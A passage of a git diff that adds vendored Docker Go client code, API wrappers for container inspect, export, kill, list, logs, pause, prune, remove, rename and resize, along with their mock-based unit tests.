nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if err := req.ParseForm(); err != nil { + return nil, err + } + execStartCheck := &types.ExecStartCheck{} + if err := json.NewDecoder(req.Body).Decode(execStartCheck); err != nil { + return nil, err + } + if execStartCheck.Tty || !execStartCheck.Detach { + return nil, fmt.Errorf("expected execStartCheck{Detach:true,Tty:false}, got %v", execStartCheck) + } + + return &http.Response{ + 
StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.ContainerExecStart(context.Background(), "exec_id", types.ExecStartCheck{ + Detach: true, + Tty: false, + }) + if err != nil { + t.Fatal(err) + } +} + +func TestContainerExecInspectError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ContainerExecInspect(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerExecInspect(t *testing.T) { + expectedURL := "/exec/exec_id/json" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + b, err := json.Marshal(types.ContainerExecInspect{ + ExecID: "exec_id", + ContainerID: "container_id", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + inspect, err := client.ContainerExecInspect(context.Background(), "exec_id") + if err != nil { + t.Fatal(err) + } + if inspect.ExecID != "exec_id" { + t.Fatalf("expected ExecID to be `exec_id`, got %s", inspect.ExecID) + } + if inspect.ContainerID != "container_id" { + t.Fatalf("expected ContainerID `container_id`, got %s", inspect.ContainerID) + } +} diff --git a/vendor/github.com/docker/docker/client/container_export.go b/vendor/github.com/docker/docker/client/container_export.go new file mode 100644 index 0000000000..52194f3d34 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_export.go @@ -0,0 +1,20 @@ +package client + +import ( + "io" + "net/url" + + "golang.org/x/net/context" +) + +// ContainerExport retrieves the raw contents of a 
container +// and returns them as an io.ReadCloser. It's up to the caller +// to close the stream. +func (cli *Client) ContainerExport(ctx context.Context, containerID string) (io.ReadCloser, error) { + serverResp, err := cli.get(ctx, "/containers/"+containerID+"/export", url.Values{}, nil) + if err != nil { + return nil, err + } + + return serverResp.body, nil +} diff --git a/vendor/github.com/docker/docker/client/container_export_test.go b/vendor/github.com/docker/docker/client/container_export_test.go new file mode 100644 index 0000000000..5849fe9252 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_export_test.go @@ -0,0 +1,50 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestContainerExportError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ContainerExport(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerExport(t *testing.T) { + expectedURL := "/containers/container_id/export" + client := &Client{ + client: newMockClient(func(r *http.Request) (*http.Response, error) { + if !strings.HasPrefix(r.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL) + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("response"))), + }, nil + }), + } + body, err := client.ContainerExport(context.Background(), "container_id") + if err != nil { + t.Fatal(err) + } + defer body.Close() + content, err := ioutil.ReadAll(body) + if err != nil { + t.Fatal(err) + } + if string(content) != "response" { + t.Fatalf("expected response to contain 'response', got %s", string(content)) + } +} diff --git 
a/vendor/github.com/docker/docker/client/container_inspect.go b/vendor/github.com/docker/docker/client/container_inspect.go new file mode 100644 index 0000000000..17f1809747 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_inspect.go @@ -0,0 +1,54 @@ +package client + +import ( + "bytes" + "encoding/json" + "io/ioutil" + "net/http" + "net/url" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// ContainerInspect returns the container information. +func (cli *Client) ContainerInspect(ctx context.Context, containerID string) (types.ContainerJSON, error) { + serverResp, err := cli.get(ctx, "/containers/"+containerID+"/json", nil, nil) + if err != nil { + if serverResp.statusCode == http.StatusNotFound { + return types.ContainerJSON{}, containerNotFoundError{containerID} + } + return types.ContainerJSON{}, err + } + + var response types.ContainerJSON + err = json.NewDecoder(serverResp.body).Decode(&response) + ensureReaderClosed(serverResp) + return response, err +} + +// ContainerInspectWithRaw returns the container information and its raw representation. 
+func (cli *Client) ContainerInspectWithRaw(ctx context.Context, containerID string, getSize bool) (types.ContainerJSON, []byte, error) { + query := url.Values{} + if getSize { + query.Set("size", "1") + } + serverResp, err := cli.get(ctx, "/containers/"+containerID+"/json", query, nil) + if err != nil { + if serverResp.statusCode == http.StatusNotFound { + return types.ContainerJSON{}, nil, containerNotFoundError{containerID} + } + return types.ContainerJSON{}, nil, err + } + defer ensureReaderClosed(serverResp) + + body, err := ioutil.ReadAll(serverResp.body) + if err != nil { + return types.ContainerJSON{}, nil, err + } + + var response types.ContainerJSON + rdr := bytes.NewReader(body) + err = json.NewDecoder(rdr).Decode(&response) + return response, body, err +} diff --git a/vendor/github.com/docker/docker/client/container_inspect_test.go b/vendor/github.com/docker/docker/client/container_inspect_test.go new file mode 100644 index 0000000000..f1a6f4ac7d --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_inspect_test.go @@ -0,0 +1,125 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestContainerInspectError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.ContainerInspect(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerInspectContainerNotFound(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "Server error")), + } + + _, err := client.ContainerInspect(context.Background(), "unknown") + if err == nil || !IsErrContainerNotFound(err) { + t.Fatalf("expected a containerNotFound error, got %v", err) + } +} + +func 
TestContainerInspect(t *testing.T) { + expectedURL := "/containers/container_id/json" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + content, err := json.Marshal(types.ContainerJSON{ + ContainerJSONBase: &types.ContainerJSONBase{ + ID: "container_id", + Image: "image", + Name: "name", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + r, err := client.ContainerInspect(context.Background(), "container_id") + if err != nil { + t.Fatal(err) + } + if r.ID != "container_id" { + t.Fatalf("expected `container_id`, got %s", r.ID) + } + if r.Image != "image" { + t.Fatalf("expected `image`, got %s", r.ID) + } + if r.Name != "name" { + t.Fatalf("expected `name`, got %s", r.ID) + } +} + +func TestContainerInspectNode(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + content, err := json.Marshal(types.ContainerJSON{ + ContainerJSONBase: &types.ContainerJSONBase{ + ID: "container_id", + Image: "image", + Name: "name", + Node: &types.ContainerNode{ + ID: "container_node_id", + Addr: "container_node", + Labels: map[string]string{"foo": "bar"}, + }, + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + r, err := client.ContainerInspect(context.Background(), "container_id") + if err != nil { + t.Fatal(err) + } + if r.ID != "container_id" { + t.Fatalf("expected `container_id`, got %s", r.ID) + } + if r.Image != "image" { + t.Fatalf("expected `image`, got %s", r.ID) + } + if r.Name != "name" { + t.Fatalf("expected `name`, got %s", r.ID) + } + if r.Node.ID != "container_node_id" { + 
t.Fatalf("expected `container_node_id`, got %s", r.Node.ID) + } + if r.Node.Addr != "container_node" { + t.Fatalf("expected `container_node`, got %s", r.Node.Addr) + } + foo, ok := r.Node.Labels["foo"] + if foo != "bar" || !ok { + t.Fatalf("expected `bar` for label `foo`") + } +} diff --git a/vendor/github.com/docker/docker/client/container_kill.go b/vendor/github.com/docker/docker/client/container_kill.go new file mode 100644 index 0000000000..29f80c73ad --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_kill.go @@ -0,0 +1,17 @@ +package client + +import ( + "net/url" + + "golang.org/x/net/context" +) + +// ContainerKill terminates the container process but does not remove the container from the docker host. +func (cli *Client) ContainerKill(ctx context.Context, containerID, signal string) error { + query := url.Values{} + query.Set("signal", signal) + + resp, err := cli.post(ctx, "/containers/"+containerID+"/kill", query, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/container_kill_test.go b/vendor/github.com/docker/docker/client/container_kill_test.go new file mode 100644 index 0000000000..9477b0abd2 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_kill_test.go @@ -0,0 +1,46 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestContainerKillError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + err := client.ContainerKill(context.Background(), "nothing", "SIGKILL") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerKill(t *testing.T) { + expectedURL := "/containers/container_id/kill" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if 
!strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + signal := req.URL.Query().Get("signal") + if signal != "SIGKILL" { + return nil, fmt.Errorf("signal not set in URL query properly. Expected 'SIGKILL', got %s", signal) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.ContainerKill(context.Background(), "container_id", "SIGKILL") + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/container_list.go b/vendor/github.com/docker/docker/client/container_list.go new file mode 100644 index 0000000000..4398912197 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_list.go @@ -0,0 +1,56 @@ +package client + +import ( + "encoding/json" + "net/url" + "strconv" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "golang.org/x/net/context" +) + +// ContainerList returns the list of containers in the docker host. 
+func (cli *Client) ContainerList(ctx context.Context, options types.ContainerListOptions) ([]types.Container, error) { + query := url.Values{} + + if options.All { + query.Set("all", "1") + } + + if options.Limit != -1 { + query.Set("limit", strconv.Itoa(options.Limit)) + } + + if options.Since != "" { + query.Set("since", options.Since) + } + + if options.Before != "" { + query.Set("before", options.Before) + } + + if options.Size { + query.Set("size", "1") + } + + if options.Filters.Len() > 0 { + filterJSON, err := filters.ToParamWithVersion(cli.version, options.Filters) + + if err != nil { + return nil, err + } + + query.Set("filters", filterJSON) + } + + resp, err := cli.get(ctx, "/containers/json", query, nil) + if err != nil { + return nil, err + } + + var containers []types.Container + err = json.NewDecoder(resp.body).Decode(&containers) + ensureReaderClosed(resp) + return containers, err +} diff --git a/vendor/github.com/docker/docker/client/container_list_test.go b/vendor/github.com/docker/docker/client/container_list_test.go new file mode 100644 index 0000000000..e41c6874b5 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_list_test.go @@ -0,0 +1,96 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "golang.org/x/net/context" +) + +func TestContainerListError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ContainerList(context.Background(), types.ContainerListOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerList(t *testing.T) { + expectedURL := "/containers/json" + expectedFilters := `{"before":{"container":true},"label":{"label1":true,"label2":true}}` + client := 
&Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + all := query.Get("all") + if all != "1" { + return nil, fmt.Errorf("all not set in URL query properly. Expected '1', got %s", all) + } + limit := query.Get("limit") + if limit != "0" { + return nil, fmt.Errorf("limit should have not be present in query. Expected '0', got %s", limit) + } + since := query.Get("since") + if since != "container" { + return nil, fmt.Errorf("since not set in URL query properly. Expected 'container', got %s", since) + } + before := query.Get("before") + if before != "" { + return nil, fmt.Errorf("before should have not be present in query, go %s", before) + } + size := query.Get("size") + if size != "1" { + return nil, fmt.Errorf("size not set in URL query properly. Expected '1', got %s", size) + } + filters := query.Get("filters") + if filters != expectedFilters { + return nil, fmt.Errorf("expected filters incoherent '%v' with actual filters %v", expectedFilters, filters) + } + + b, err := json.Marshal([]types.Container{ + { + ID: "container_id1", + }, + { + ID: "container_id2", + }, + }) + if err != nil { + return nil, err + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + filters := filters.NewArgs() + filters.Add("label", "label1") + filters.Add("label", "label2") + filters.Add("before", "container") + containers, err := client.ContainerList(context.Background(), types.ContainerListOptions{ + Size: true, + All: true, + Since: "container", + Filters: filters, + }) + if err != nil { + t.Fatal(err) + } + if len(containers) != 2 { + t.Fatalf("expected 2 containers, got %v", containers) + } +} diff --git a/vendor/github.com/docker/docker/client/container_logs.go b/vendor/github.com/docker/docker/client/container_logs.go 
new file mode 100644 index 0000000000..69056b6321 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_logs.go @@ -0,0 +1,52 @@ +package client + +import ( + "io" + "net/url" + "time" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + timetypes "github.com/docker/docker/api/types/time" +) + +// ContainerLogs returns the logs generated by a container in an io.ReadCloser. +// It's up to the caller to close the stream. +func (cli *Client) ContainerLogs(ctx context.Context, container string, options types.ContainerLogsOptions) (io.ReadCloser, error) { + query := url.Values{} + if options.ShowStdout { + query.Set("stdout", "1") + } + + if options.ShowStderr { + query.Set("stderr", "1") + } + + if options.Since != "" { + ts, err := timetypes.GetTimestamp(options.Since, time.Now()) + if err != nil { + return nil, err + } + query.Set("since", ts) + } + + if options.Timestamps { + query.Set("timestamps", "1") + } + + if options.Details { + query.Set("details", "1") + } + + if options.Follow { + query.Set("follow", "1") + } + query.Set("tail", options.Tail) + + resp, err := cli.get(ctx, "/containers/"+container+"/logs", query, nil) + if err != nil { + return nil, err + } + return resp.body, nil +} diff --git a/vendor/github.com/docker/docker/client/container_logs_test.go b/vendor/github.com/docker/docker/client/container_logs_test.go new file mode 100644 index 0000000000..99e31842c9 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_logs_test.go @@ -0,0 +1,133 @@ +package client + +import ( + "bytes" + "fmt" + "io" + "io/ioutil" + "log" + "net/http" + "os" + "strings" + "testing" + "time" + + "github.com/docker/docker/api/types" + + "golang.org/x/net/context" +) + +func TestContainerLogsError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ContainerLogs(context.Background(), "container_id", types.ContainerLogsOptions{}) + if 
err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } + _, err = client.ContainerLogs(context.Background(), "container_id", types.ContainerLogsOptions{ + Since: "2006-01-02TZ", + }) + if err == nil || !strings.Contains(err.Error(), `parsing time "2006-01-02TZ"`) { + t.Fatalf("expected a 'parsing time' error, got %v", err) + } +} + +func TestContainerLogs(t *testing.T) { + expectedURL := "/containers/container_id/logs" + cases := []struct { + options types.ContainerLogsOptions + expectedQueryParams map[string]string + }{ + { + expectedQueryParams: map[string]string{ + "tail": "", + }, + }, + { + options: types.ContainerLogsOptions{ + Tail: "any", + }, + expectedQueryParams: map[string]string{ + "tail": "any", + }, + }, + { + options: types.ContainerLogsOptions{ + ShowStdout: true, + ShowStderr: true, + Timestamps: true, + Details: true, + Follow: true, + }, + expectedQueryParams: map[string]string{ + "tail": "", + "stdout": "1", + "stderr": "1", + "timestamps": "1", + "details": "1", + "follow": "1", + }, + }, + { + options: types.ContainerLogsOptions{ + // An complete invalid date, timestamp or go duration will be + // passed as is + Since: "invalid but valid", + }, + expectedQueryParams: map[string]string{ + "tail": "", + "since": "invalid but valid", + }, + }, + } + for _, logCase := range cases { + client := &Client{ + client: newMockClient(func(r *http.Request) (*http.Response, error) { + if !strings.HasPrefix(r.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL) + } + // Check query parameters + query := r.URL.Query() + for key, expected := range logCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. 
Expected '%s', got %s", key, expected, actual) + } + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("response"))), + }, nil + }), + } + body, err := client.ContainerLogs(context.Background(), "container_id", logCase.options) + if err != nil { + t.Fatal(err) + } + defer body.Close() + content, err := ioutil.ReadAll(body) + if err != nil { + t.Fatal(err) + } + if string(content) != "response" { + t.Fatalf("expected response to contain 'response', got %s", string(content)) + } + } +} + +func ExampleClient_ContainerLogs_withTimeout() { + ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second) + defer cancel() + + client, _ := NewEnvClient() + reader, err := client.ContainerLogs(ctx, "container_id", types.ContainerLogsOptions{}) + if err != nil { + log.Fatal(err) + } + + _, err = io.Copy(os.Stdout, reader) + if err != nil && err != io.EOF { + log.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/container_pause.go b/vendor/github.com/docker/docker/client/container_pause.go new file mode 100644 index 0000000000..412067a782 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_pause.go @@ -0,0 +1,10 @@ +package client + +import "golang.org/x/net/context" + +// ContainerPause pauses the main process of a given container without terminating it. 
+func (cli *Client) ContainerPause(ctx context.Context, containerID string) error { + resp, err := cli.post(ctx, "/containers/"+containerID+"/pause", nil, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/container_pause_test.go b/vendor/github.com/docker/docker/client/container_pause_test.go new file mode 100644 index 0000000000..0ee2f05d7e --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_pause_test.go @@ -0,0 +1,41 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestContainerPauseError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + err := client.ContainerPause(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerPause(t *testing.T) { + expectedURL := "/containers/container_id/pause" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + err := client.ContainerPause(context.Background(), "container_id") + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/container_prune.go b/vendor/github.com/docker/docker/client/container_prune.go new file mode 100644 index 0000000000..b582170867 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_prune.go @@ -0,0 +1,36 @@ +package client + +import ( + "encoding/json" + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "golang.org/x/net/context" +) + 
+// ContainersPrune requests the daemon to delete unused data +func (cli *Client) ContainersPrune(ctx context.Context, pruneFilters filters.Args) (types.ContainersPruneReport, error) { + var report types.ContainersPruneReport + + if err := cli.NewVersionError("1.25", "container prune"); err != nil { + return report, err + } + + query, err := getFiltersQuery(pruneFilters) + if err != nil { + return report, err + } + + serverResp, err := cli.post(ctx, "/containers/prune", query, nil, nil) + if err != nil { + return report, err + } + defer ensureReaderClosed(serverResp) + + if err := json.NewDecoder(serverResp.body).Decode(&report); err != nil { + return report, fmt.Errorf("Error retrieving disk usage: %v", err) + } + + return report, nil +} diff --git a/vendor/github.com/docker/docker/client/container_remove.go b/vendor/github.com/docker/docker/client/container_remove.go new file mode 100644 index 0000000000..3a79590ced --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_remove.go @@ -0,0 +1,27 @@ +package client + +import ( + "net/url" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// ContainerRemove kills and removes a container from the docker host. 
+func (cli *Client) ContainerRemove(ctx context.Context, containerID string, options types.ContainerRemoveOptions) error { + query := url.Values{} + if options.RemoveVolumes { + query.Set("v", "1") + } + if options.RemoveLinks { + query.Set("link", "1") + } + + if options.Force { + query.Set("force", "1") + } + + resp, err := cli.delete(ctx, "/containers/"+containerID, query, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/container_remove_test.go b/vendor/github.com/docker/docker/client/container_remove_test.go new file mode 100644 index 0000000000..798c08b333 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_remove_test.go @@ -0,0 +1,59 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestContainerRemoveError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + err := client.ContainerRemove(context.Background(), "container_id", types.ContainerRemoveOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerRemove(t *testing.T) { + expectedURL := "/containers/container_id" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + volume := query.Get("v") + if volume != "1" { + return nil, fmt.Errorf("v (volume) not set in URL query properly. Expected '1', got %s", volume) + } + force := query.Get("force") + if force != "1" { + return nil, fmt.Errorf("force not set in URL query properly. 
Expected '1', got %s", force) + } + link := query.Get("link") + if link != "" { + return nil, fmt.Errorf("link should have not be present in query, go %s", link) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.ContainerRemove(context.Background(), "container_id", types.ContainerRemoveOptions{ + RemoveVolumes: true, + Force: true, + }) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/container_rename.go b/vendor/github.com/docker/docker/client/container_rename.go new file mode 100644 index 0000000000..0e718da7c6 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_rename.go @@ -0,0 +1,16 @@ +package client + +import ( + "net/url" + + "golang.org/x/net/context" +) + +// ContainerRename changes the name of a given container. +func (cli *Client) ContainerRename(ctx context.Context, containerID, newContainerName string) error { + query := url.Values{} + query.Set("name", newContainerName) + resp, err := cli.post(ctx, "/containers/"+containerID+"/rename", query, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/container_rename_test.go b/vendor/github.com/docker/docker/client/container_rename_test.go new file mode 100644 index 0000000000..732ebff5f7 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_rename_test.go @@ -0,0 +1,46 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestContainerRenameError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + err := client.ContainerRename(context.Background(), "nothing", "newNothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func 
TestContainerRename(t *testing.T) { + expectedURL := "/containers/container_id/rename" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + name := req.URL.Query().Get("name") + if name != "newName" { + return nil, fmt.Errorf("name not set in URL query properly. Expected 'newName', got %s", name) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.ContainerRename(context.Background(), "container_id", "newName") + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/container_resize.go b/vendor/github.com/docker/docker/client/container_resize.go new file mode 100644 index 0000000000..66c3cc1940 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_resize.go @@ -0,0 +1,29 @@ +package client + +import ( + "net/url" + "strconv" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// ContainerResize changes the size of the tty for a container. +func (cli *Client) ContainerResize(ctx context.Context, containerID string, options types.ResizeOptions) error { + return cli.resize(ctx, "/containers/"+containerID, options.Height, options.Width) +} + +// ContainerExecResize changes the size of the tty for an exec process running inside a container. 
+func (cli *Client) ContainerExecResize(ctx context.Context, execID string, options types.ResizeOptions) error { + return cli.resize(ctx, "/exec/"+execID, options.Height, options.Width) +} + +func (cli *Client) resize(ctx context.Context, basePath string, height, width uint) error { + query := url.Values{} + query.Set("h", strconv.Itoa(int(height))) + query.Set("w", strconv.Itoa(int(width))) + + resp, err := cli.post(ctx, basePath+"/resize", query, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/container_resize_test.go b/vendor/github.com/docker/docker/client/container_resize_test.go new file mode 100644 index 0000000000..5b2efecdce --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_resize_test.go @@ -0,0 +1,82 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestContainerResizeError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + err := client.ContainerResize(context.Background(), "container_id", types.ResizeOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerExecResizeError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + err := client.ContainerExecResize(context.Background(), "exec_id", types.ResizeOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestContainerResize(t *testing.T) { + client := &Client{ + client: newMockClient(resizeTransport("/containers/container_id/resize")), + } + + err := client.ContainerResize(context.Background(), "container_id", types.ResizeOptions{ + Height: 
500, + Width: 600, + }) + if err != nil { + t.Fatal(err) + } +} + +func TestContainerExecResize(t *testing.T) { + client := &Client{ + client: newMockClient(resizeTransport("/exec/exec_id/resize")), + } + + err := client.ContainerExecResize(context.Background(), "exec_id", types.ResizeOptions{ + Height: 500, + Width: 600, + }) + if err != nil { + t.Fatal(err) + } +} + +func resizeTransport(expectedURL string) func(req *http.Request) (*http.Response, error) { + return func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + h := query.Get("h") + if h != "500" { + return nil, fmt.Errorf("h not set in URL query properly. Expected '500', got %s", h) + } + w := query.Get("w") + if w != "600" { + return nil, fmt.Errorf("w not set in URL query properly. Expected '600', got %s", w) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + } +} diff --git a/vendor/github.com/docker/docker/client/container_restart.go b/vendor/github.com/docker/docker/client/container_restart.go new file mode 100644 index 0000000000..74d7455f02 --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_restart.go @@ -0,0 +1,22 @@ +package client + +import ( + "net/url" + "time" + + timetypes "github.com/docker/docker/api/types/time" + "golang.org/x/net/context" +) + +// ContainerRestart stops and starts a container again. +// It makes the daemon to wait for the container to be up again for +// a specific amount of time, given the timeout. 
